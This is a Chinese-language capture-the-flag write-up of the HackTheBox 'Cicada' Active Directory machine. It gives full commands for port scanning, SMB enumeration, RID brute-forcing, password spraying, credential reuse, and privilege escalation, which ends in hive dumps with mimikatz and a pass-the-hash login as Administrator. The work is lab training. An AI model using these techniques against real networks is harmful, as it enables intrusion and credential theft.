HTB:Cicada[RE-WriteUP]

0DayHP2025-01-30 16:27

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

将靶机TCP开放端口号提取并保存

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用nmap对靶机UDP开放端口进行脚本、服务扫描

使用smbmap枚举靶机SMB共享

继续使用smbmap递归枚举HR共享

边界突破

使用netexec通过爆破靶机RID以枚举域内用户

使用netexec通过上述名单以及默认密码进行密码喷洒

使用netexec通过上述凭证枚举靶机AD域内用户信息

使用smbmap通过上述凭证再次枚举靶机SMB服务共享

使用evil-winrm通过上述凭证登录靶机Win-RM服务

权限提升

查看当前用户账户信息

将系统中的SAM、SYSTEM文件备份到当前目录

在攻击机本地开启一个SMB服务器以便传输文件

控制靶机将攻击机中的mimikatz上传至靶机

使用mimikatz通过SAM、SYSTEM文件解析出密码哈希

使用evil-winrm通过上述凭证登录靶机Win-RM服务

连接至HTB服务器并启动靶机

分配IP:10.10.16.22

靶机IP:10.10.11.35

靶机Domain:cicada.htb

信息收集

使用rustscan对靶机TCP端口进行开放扫描

bash 复制代码 
rustscan -a 10.10.11.35 -r 1-65535 --ulimit 5000 | tee res
将靶机TCP开放端口号提取并保存
bash 复制代码 
ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,

53,88,135,139,389,445,464,593,636,3268,3269,5985,64644

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# echo $ports

53,88,135,139,389,445,464,593,636,3268,3269,5985,64644

使用nmap对靶机TCP开放端口进行脚本、服务扫描

bash 复制代码 
nmap -sT -p$ports -sCV -Pn 10.10.11.35
  • 需要重点关注的服务和信息

AD域名:cicada.htb

53端口:Domain服务

88端口:Kerberos服务

389端口:LDAP服务

445端口:SMB服务

5985端口:Win-RM服务

使用nmap对靶机TCP开放端口进行漏洞、系统扫描
bash 复制代码 
nmap -sT -p$ports --script=vuln -O -Pn 10.10.11.35

使用nmap对靶机常用UDP端口进行开放扫描

bash 复制代码 
nmap -sU --top-ports 20 -Pn 10.10.11.35
使用nmap对靶机UDP开放端口进行脚本、服务扫描
bash 复制代码 
nmap -sU -p53,123 -sCV -Pn 10.10.11.35

使用smbmap枚举靶机SMB共享

bash 复制代码 
smbmap -u guest -H cicada.htb
继续使用smbmap递归枚举HR共享
bash 复制代码 
smbmap -u guest -H cicada.htb -r HR --depth 5
  • 将HR共享中的Notice from HR.txt文件下载到攻击机本地
bash 复制代码 
smbmap -u guest -H cicada.htb -r HR --depth 5 --download './HR/Notice from HR.txt'
  • 查看该文件内容
bash 复制代码 
cat '10.10.11.35-HR_Notice from HR.txt'
  • 由该文本可知,新雇员默认密码为:Cicada$M6Corpb*@Lp#nZp!8

边界突破

使用netexec通过爆破靶机RID以枚举域内用户

bash 复制代码 
netexec smb cicada.htb -u guest -p '' --rid-brute
  • 通过切割字符串使其只输出用户名部分
bash 复制代码 
netexec smb cicada.htb -u guest -p '' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | awk '{print $1}'

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# netexec smb cicada.htb -u guest -p '' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | awk '{print $1}'

Administrator

Guest

krbtgt

CICADA-DC$

john.smoulder

sarah.dantelia

michael.wrightson

david.orelious

emily.oscars

  • 将用户名存入名单文件中以便利用

┌──(root㉿kali)-[/home/kali/Desktop/temp]

└─# cat << EOF > names.txt

heredoc> Administrator

Guest

krbtgt

CICADA-DC$

john.smoulder

sarah.dantelia

michael.wrightson

david.orelious

emily.oscars

heredoc> EOF

使用netexec通过上述名单以及默认密码进行密码喷洒
bash 复制代码 
netexec smb cicada.htb -u ./names.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success

账户:michael.wrightson

密码:Cicada$M6Corpb*@Lp#nZp!8

使用netexec通过上述凭证枚举靶机AD域内用户信息

bash 复制代码 
netexec smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

账户:david.orelious

密码:aRt$Lp#7t*VQ!3

使用smbmap通过上述凭证再次枚举靶机SMB服务共享

bash 复制代码 
smbmap -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -H cicada.htb
  • 继续使用smbmap枚举DEV共享内容
bash 复制代码 
smbmap -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -H cicada.htb -r DEV
  • 将DEV共享中的Backup_script.ps1文件下载到攻击机本地
bash 复制代码 
smbmap -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -H cicada.htb -r DEV --download './DEV/Backup_script.ps1'
  • 查看该文件内容
bash 复制代码 
cat 10.10.11.35-DEV_Backup_script.ps1
bash 复制代码 
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
  • 审计文件内容可得一凭证

账户:emily.oscars

密码:Q!3@Lp#M6b*7t*Vt

使用evil-winrm通过上述凭证登录靶机Win-RM服务

bash 复制代码 
evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
  • C:\Users\emily.oscars.CICADA\Desktop目录下找到user.txt文件

权限提升

查看当前用户账户信息

bash 复制代码 
net user emily.oscars
  • 由输出可见,当前账户属于`文件备份操作者(Backup Operators)`组,这意味着当前用户可以直接备份系统中的任何文件

将系统中的SAM、SYSTEM文件备份到当前目录

bash 复制代码 
reg save HKLM\SAM .\SAM
bash 复制代码 
reg save HKLM\SYSTEM .\SYSTEM

在攻击机本地开启一个SMB服务器以便传输文件

bash 复制代码 
impacket-smbserver temp . -smb2support
  • 控制靶机连接至攻击机SMB服务器
bash 复制代码 
net use Z: \\10.10.16.22\temp
控制靶机将攻击机中的mimikatz上传至靶机
bash 复制代码 
copy \\10.10.16.22\temp\mimikatz64.exe .

使用mimikatz通过SAM、SYSTEM文件解析出密码哈希

bash 复制代码 
.\mimikatz64.exe "lsadump::sam /sam:sam /system:system" exit

账户:Administrator

密码哈希:2b87e7c93a3e8a0ea4a581937016f341

使用evil-winrm通过上述凭证登录靶机Win-RM服务

bash 复制代码 
evil-winrm -i cicada.htb -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
  • C:\Users\Administrator\Desktop目录下找到root.txt文件。祝各位2025新年快乐!:=)
相关推荐
Johny_Zhao1 天前
Centos8搭建hadoop高可用集群
linux·hadoop·python·网络安全·信息安全·云计算·shell·yum源·系统运维·itsm
落鹜秋水2 天前
Cacti命令执行漏洞分析(CVE-2022-46169)
web安全·网络安全
pencek2 天前
XCTF-crypto-幂数加密
网络安全
会议之眼2 天前
截稿倒计时 TrustCom‘25大会即将召开
网络安全
周先森的怣忈2 天前
渗透高级-----测试复现(第三次作业)
网络安全
MUY09902 天前
OSPF之多区域
网络·网络安全
波吉爱睡觉2 天前
文件解析漏洞大全
web安全·网络安全
青藤云安全2 天前
青藤天睿RASP再次发威!捕获E签宝RCE 0day漏洞
网络安全
pencek3 天前
HakcMyVM-Medusa
网络安全
Whoisshutiao4 天前
网安-SQL注入-sqli-labs
数据库·sql·网络安全
热门推荐
01Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code02vue数据变化但页面不变03全球最强模型Grok4,国内已可免费使用!(附教程)04扣子开源本地部署教程 丨Coze智能体小白喂饭级指南05KGG转MP3工具|非KGM文件|解密音频06sqli-labs 靶场 less-8、9、10 第八关到第十关详解:布尔注入,时间注入07干翻 Typora!MilkUp:完全免费的桌面端 Markdown 编辑器!08Coze 开源了,送上保姆级私有化部署方案【建议收藏】09【2025.7.18】更新vscode后所有.vue文件template标签后报红的临时解决办法,Vue - Official 插件3.0.2导致10Claude Code用不了?来试下Qwen3-Coder加持的Qwen Code吧